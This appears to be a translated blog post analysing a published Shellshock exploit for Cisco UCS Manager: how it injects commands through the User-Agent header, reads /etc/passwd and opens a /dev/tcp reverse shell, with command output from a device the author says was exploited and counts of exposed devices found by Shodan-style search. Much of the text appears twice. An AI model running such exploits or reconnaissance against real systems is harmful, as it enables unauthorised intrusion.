An exploit for vulnerabilities in Cisco UCS Manager: is the devil so scary?
An exploit for Cisco UCS Manager has been published online. Version 2.1 (1b) and possibly others are said to be vulnerable.
On the Cisco website, the GNU Bash Environment Variable Command Injection Vulnerability section states that updated versions of the products that fix the vulnerability are available:
Own testing has shown that versions are vulnerable:
Not vulnerable:
We analyzed the work of the exploit, as well as the number of vulnerable devices. Using the search engine Shodan and our own search analogue (long live import substitution). And that's what happened.
Judging by the exploit code, the commands are injected into the User-Agent field when working on a specially formed URL using the HTTPS protocol. You can divide the work of the exploit into 2 stages. At the first stage, the exploit tries to determine if the system is vulnerable. For this, the user file "/ etc / passwd" is read and the user "root" is searched. At the second stage, a reverse connection is made to the attacking node under control, using the features of the / dev / tcp pseudo device .
We found vulnerable hardware and I was able to play around with the exploit a bit.
')
We execute commands.
Read the contents of the file "/ etc / passwd"
Those. the root user really exists, and the vulnerable software is launched from the daemon user.
Also open many ports.
Injecting code into the User-Agent string is a common practice. For example, a vulnerability search script of the Shellshock type for the nmap network scanner also uses this approach in the default settings. Although I personally was not able to configure this script so that it actually identified a vulnerability in the tested equipment of Cisco UCS Manager.
Search Engine Shodan for the query "Cisco UCS Manager" does not produce anything. And at the request of "Cisco UCS" - a lot of things, from which you can find 7 addresses related to the desired device. It seems that the problem is the impossibility of searching for a substring of several words: as a result, any expression is searched for. Although, maybe I'm just an inexperienced user of Shodan.
At the PHDays 2015 conference, I and my colleague talked about my search engine, similar to Shodan .
Search by banal query in 2 networks with mask 16:
We basically told how the search engine works. But they also raised the problem of searching for specific equipment: you need to find the maximum number of devices on request. At the same time, the query results should contain a minimum of garbage. In particular, they expressed a thought about a certain digital footprint. In short: the equipment is configured differently (default settings, or custom settings, equipment operation behind a firewall or behind NAT). Studying each case by trial and error, and also taking into account the accumulated experience, a completely non-trivial query is created. Its results can be very different from the banal initial search. It happened in this situation. For example, as can be seen from the screenshot above, when searching for a device, the string “OpenSSL / FIPS” is encountered. The search for this line in Shodan again disappoints: the results again do not have a clear search line. Search in our search engine increased the number of detected addresses compared to the previous search. Although, frankly, such a search still gives out junk entries. Those. records that, when checked, have nothing in common with Cisco UCS Manager.
In general, the issue of creating digital fingerprints (including for specific devices) is a topic for a separate article. I will confine myself to the fact: we found about 50devices with unique IP addresses (it’s not entirely correct to talk about the number of devices found, since each device can have several network interfaces with different addresses). Mostly in the USA.
At the moment, the issue of providing access to our search engine to a wide audience is being considered. If there is interest from the community.
On the Cisco website, the GNU Bash Environment Variable Command Injection Vulnerability section states that updated versions of the products that fix the vulnerability are available:
- 3.0 (1d) (Available)
- 2.2 (3b) (Available)
- 2.2 (2e) (Available)
- 2.2 (1f) (Available)
- 2.1 (3f) (Available)
- 2.0 (5g) (Available)
Own testing has shown that versions are vulnerable:
- 2.2 (1d)
- 2.2 (1c)
- 2.1 (2a)
Not vulnerable:
- 2.2 (6c)
- 2.2 (3e)
We analyzed the work of the exploit, as well as the number of vulnerable devices. Using the search engine Shodan and our own search analogue (long live import substitution). And that's what happened.
Judging by the exploit code, the commands are injected into the User-Agent field when working on a specially formed URL using the HTTPS protocol. You can divide the work of the exploit into 2 stages. At the first stage, the exploit tries to determine if the system is vulnerable. For this, the user file "/ etc / passwd" is read and the user "root" is searched. At the second stage, a reverse connection is made to the attacking node under control, using the features of the / dev / tcp pseudo device .
We found vulnerable hardware and I was able to play around with the exploit a bit.
')
We execute commands.
$ who daemon Read the contents of the file "/ etc / passwd"
$ cat /etc/passwd root:*:0:0:root:/root:/isanboot/bin/nobash bin:*:1:1:bin:/bin: daemon:*:2:2:daemon:/usr/sbin: sys:*:3:3:sys:/dev: ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash ftpuser:*:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash nobody:*:65534:65534:nobody:/home:/bin/sh admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm svc-isan:*:499:501::/var/home/svc-isan:/isan/bin/vsh_perm samdme:x:2003:504::/var/home/samdme:/bin/bash Those. the root user really exists, and the vulnerable software is launched from the daemon user.
Also open many ports.
Here is a short list.
$ netstat -ln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:161 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:36738 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:6021 0.0.0.0:* LISTEN
tcp 0 0 127.12.0.1:4101 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:5991 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:7911 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:5961 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:906 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:907 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:6351 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:5871 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:906 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:907 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:6351 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:5871 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:6321 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:5841 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:5781 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:6261 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:51189 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:4023 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:27000 0.0.0.0:* LISTEN
uname -a
Linux UCS078A-AA 2.6.27.10 #1 SMP Fri Nov 15 03:08:09 PST 2013 i686 i686 i386 GNU/Linux
cat /etc/*release
Wind River Linux
Injecting code into the User-Agent string is a common practice. For example, a vulnerability search script of the Shellshock type for the nmap network scanner also uses this approach in the default settings. Although I personally was not able to configure this script so that it actually identified a vulnerability in the tested equipment of Cisco UCS Manager.
Search Engine Shodan for the query "Cisco UCS Manager" does not produce anything. And at the request of "Cisco UCS" - a lot of things, from which you can find 7 addresses related to the desired device. It seems that the problem is the impossibility of searching for a substring of several words: as a result, any expression is searched for. Although, maybe I'm just an inexperienced user of Shodan.
At the PHDays 2015 conference, I and my colleague talked about my search engine, similar to Shodan .
Search by banal query in 2 networks with mask 16:
We basically told how the search engine works. But they also raised the problem of searching for specific equipment: you need to find the maximum number of devices on request. At the same time, the query results should contain a minimum of garbage. In particular, they expressed a thought about a certain digital footprint. In short: the equipment is configured differently (default settings, or custom settings, equipment operation behind a firewall or behind NAT). Studying each case by trial and error, and also taking into account the accumulated experience, a completely non-trivial query is created. Its results can be very different from the banal initial search. It happened in this situation. For example, as can be seen from the screenshot above, when searching for a device, the string “OpenSSL / FIPS” is encountered. The search for this line in Shodan again disappoints: the results again do not have a clear search line. Search in our search engine increased the number of detected addresses compared to the previous search. Although, frankly, such a search still gives out junk entries. Those. records that, when checked, have nothing in common with Cisco UCS Manager.
In general, the issue of creating digital fingerprints (including for specific devices) is a topic for a separate article. I will confine myself to the fact: we found about 50
At the moment, the issue of providing access to our search engine to a wide audience is being considered. If there is interest from the community.
Source: https://habr.com/ru/post/280364/
All Articles